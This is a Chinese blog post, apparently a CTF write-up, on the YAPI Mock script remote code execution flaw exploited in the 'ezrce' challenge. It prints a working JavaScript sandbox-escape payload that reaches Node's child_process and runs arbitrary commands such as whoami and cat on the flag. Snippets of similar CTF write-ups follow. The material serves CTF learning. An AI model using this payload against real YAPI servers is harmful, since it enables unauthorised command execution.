DASCTF July X CBCTF 4th--ezrce

最新推荐文章于 2024-04-06 08:18:51 发布
最新推荐文章于 2024-04-06 08:18:51 发布
阅读量273 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46263951/article/details/119414617
版权

YAPI Mock远程代码执行漏洞

YAPI使用mock数据/脚本作为中间交互层,其中mock数据通过设定固定数据返回固定内容,对于需要根据用户请求定制化响应内容的情况mock脚本通过写JS脚本的方式处理用户请求参数返回定制化内容,本次漏洞就是发生在mock脚本服务上。由于mock脚本自定义服务未对JS脚本加以命令过滤,用户可以添加任何请求处理脚本,因此可以在脚本中植入命令,等用户访问接口发起请求时触发命令执行。

添加一个项目后,这里是最关键的

const sandbox = this

const ObjectConstructor = this.constructor

const FunctionConstructor = ObjectConstructor.constructor

const myfun = FunctionConstructor('return process')

const process = myfun()

mockJson =process.mainModule.require("child_process").execSync("whoami").toString()

whoami处可以替换成我们想要执行的命令

两层查找后成功查找到flag文件

同样方法cat flag文件即可

Uzero.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DASCTF 7月部分pwn
starssgo的博客
07-25 1408
做了pwn1跟pwn3,pwn2没做出来(俺是废物)… pwn1 签到题,但是我们要记住 .text:080485F8 mov eax, 0 .text:080485FD mov ecx, [ebp+var_4] .text:08048600 leave .text:08048601 lea esp, [ecx-4] .text:08048604
ez_rce
qq_43774856的博客
12-30 438
ez_rce 打开链接,得到源码 <?php error_reporting(0); if (!isset($_POST['code'])) { highlight_file(__FILE__); } else { if (substr(md5($_GET['pass']), 0, 6) === "7b6db2") { $str = $_POST['code']; $butaixing = ['[a-z]','\+', '[\x7f-\xff]', '
ezrce
lastwinn的博客
08-01 432
ezrce 打开题目看看 先注册一个账号 进去之后先创建一个项目 再添加一个接口 选择高级Mock,然后选择脚本,点击开启脚本,将payload放上去,点击保存 const sandbox = this const ObjectConstructor = this.constructor const FunctionConstructor = ObjectConstructor.constructor const myfun = FunctionCo...
2020DASCTF七月赛-bulls**t
k0414的博客
07-25 1715
题目: def pairing(a,b): shell = max(a, b) step = min(a, b) if step == b: flag = 0 else: flag = 1 return shell ** 2 + step * 2 + flag def encrypt(message): res = '' for i in range(0,len(message),2): res +=
[NSSRound#4 SWPU]ez_rce
m0_73121489的博客
04-28 507
标签说是CVE-2021-41773(Apache HTTP Server路径穿越漏洞)这里直接cat /flag_is here 是什么都没有的。我一个个试了一遍,在run.sh里面找到了flag的真正位置。dirsearch扫目录也没有扫什么有用的出来。
QtScrcpy-win-x64-v2.2.1.zip
05-24
QtScrcpy-win-x64-v2.2.1.zip 是一个针对Windows 64位操作系统的QtScrcpy软件的压缩包,版本号为2.2.1。QtScrcpy是一款开源的屏幕镜像工具,它允许用户将Android设备的屏幕实时投射到电脑上,类似于Apple的AirPlay或...
NTFS System Crash - Marius Tivadar - July 19th, 2017-计算机科学
04-22
NTFS.sys crash Marius TIVADARmarius.tivadar@gmail.comJuly 19, 20171 Introduction Type of issue: denial of service. One can generate blue-screen-of-death using a handcrafted NTFS image....
Python4DelphiPart-1-7139726.pdf
最新发布
07-03
Python4DelphiPart-
July4-融资并购经理.doc
09-09
4. **完善部门运作**:构建完善的部门运营体系,通过设定明确的岗位职责和业绩考核,提升部门运行效率和员工满意度。 综上,融资并购经理是企业战略扩展和资本运作的关键人物,其职责涵盖从战略规划到具体执行的多...
MS-700.2022-July-07.129q.pdf
12-14
4. **解决方案** - 要满足安全策略要求,除了调整全局会议策略外,还需要在Azure Active Directory (AAD)中配置来宾访问策略,具体来说,应设置允许的来宾域列表,并禁用嘉宾的邀请权限。 - 可能还需要利用Azure ...
[SWPUCTF 2022 新生赛]ez_rce
wyxlsm的博客
03-22 671
在写真不知道怎么下手 我去扫一下 后门文件 是有一些 tp5 的think php的漏洞 不说了 看下一步。这样我们看到flag 值 我们可以去访问他 得到flag。查看一下根目录下的flag 名字的文件。我们可以去访问他 得到。去利用漏洞利用的命令。
[SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce、[UUCTF 2022 新生赛]ez_rce
weixin_46497491的博客
11-07 3872
[SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce
纳新复赛wp
qq_74655174的博客
02-22 251
纳新复赛wp
NSSCTF Round#7 Team ez_rce和0o0讲解
m0_64815693的博客
01-29 2629
NSSCTF Round#7 Team ez_rce和0o0讲解
2022UUCTF-web
bossDDYY的博客
11-03 1932
我们先输入手机号和验证码试试,发现无论请求多少次 hint永远是895547922,结合mt_srand和mt_rand函数 当设置的种子确定(此处的种子时输入的手机号)时,每次的mt_rand都是固定的 我们可以猜测hint就是mt_rand的第一次,而目的验证码就是mt_rand的第二次。而且我们笃定是有上传的网页的,限制了文件类型 我们想要上传的是so,但是LD_PRELOAD也能解析jpg后缀 所以修改后缀上传就可以。sub的值是当前时间的最后一位,也就是保证当前的时间为xxxxxxxx1即可。
[UUCTF 2022 新生赛]ez_rce(1),2024年大厂网络安全面经
m0_61549953的博客
04-06 855
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
CTF刷题记录(一)
m0_63441547的博客
06-15 245
把这个对象当成了字符串,所以调用了 day 类的 __toString() 方法,然后再调用 dark 类里的 go() 方法,然后在 go() 方法里把这个对象当成了方法使用,所以就去调用了 light 类的 __invoke 方法,又因为在 __invoke 方法里再次调用了一个不存在的 d() 方法,接着就会去调用 day 类里的 __call 方法,最后去调用 dark 类里的 getFlag() 方法。输出结果:O:5:"night":1:{s:5:"night";简单构造,有过滤,不行。
Header:请求头参数详解
panying1的博客
12-08 2646
Header 解释 示例 Accept 指定客户端能够接收的内容类型 Accept: text/plain, text/html,application/json Accept-Charset 浏览器可以接受的字符编码集。 Accept-Charset: iso-8859-5 Accept-Encoding 指定浏览器可以支持的web服务器返回内
DASCTF Oct X 吉林工师_Misc_复现
M3ng@L的博客
03-02 1435
DASCTF Oct X 吉林工师_Misc_复现WELCOME DASCTFxJlenugiveyourflag闯入魔塔的魔法少女魔法秘文不可以色色魔法信息英语不好的魔法少女彁彁魔法少女的迷音卡比卡比卡比Twinkle Twinkle Starry Night Perference:Perference:Perference: (11条消息) DASCTF Oct X 吉林工师 欢迎来到魔法世界~ WriteUp_七月的博客-CSDN博客 WELCOME DASCTFxJlenu keywords:key
iatf-16949-sis-july-2021
10-23
IATF 16949-SIS-July 2021是指国际汽车工作组(IATF)16949标准的最新版本,该版本于2021年7月发布。IATF 16949是汽车行业的质量管理系统要求,它基于国际质量管理标准ISO 9001,并在汽车行业领域进行了特定的更新和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值